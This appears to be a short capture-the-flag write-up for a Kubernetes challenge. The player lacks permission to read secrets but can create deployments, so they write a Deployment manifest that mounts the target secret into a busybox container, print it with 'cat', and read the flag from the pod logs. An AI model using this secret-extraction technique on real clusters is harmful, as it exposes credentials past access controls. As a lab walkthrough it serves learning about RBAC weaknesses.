Rating:
Using `kubectl auth can-i --list`, we see that we can't access secrets anymore, but we can create deployments.
Looking at the existing pod, we see that it mounts a secret called `y0u-cant-l1st-m3-s3crets-n0w`, but it only outputs the hash and we can't exec into it in this challenge.
We can create a deployment similar to the existing pod, but without the hashing:
```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: flag-getter
spec:
replicas: 1
selector:
matchLabels:
app: flag-getter
template:
metadata:
labels:
app: flag-getter
spec:
containers:
- command:
- cat
- /flag/flag
image: busybox
imagePullPolicy: IfNotPresent
name: flag-getter
volumeMounts:
- mountPath: /flag
name: flag
volumes:
- name: flag
secret:
secretName: y0u-cant-l1st-m3-s3crets-n0w
```
This will die immediately, but that's fine - just read the pod logs and it will have the flag.